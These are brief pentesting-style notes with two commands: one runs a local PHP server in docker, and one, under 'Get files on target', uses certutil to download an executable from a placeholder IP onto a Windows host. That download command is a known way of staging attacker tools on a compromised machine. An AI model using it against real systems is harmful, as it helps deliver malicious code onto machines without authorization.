Tips and Tricks

Pop up a quick PHP server

1
docker run -p 8080:80 -v $(pwd):/var/www/html php:apache

Get files on target

certutil -urlcache -f http://IP/file.exe C:\Path\to\file.exe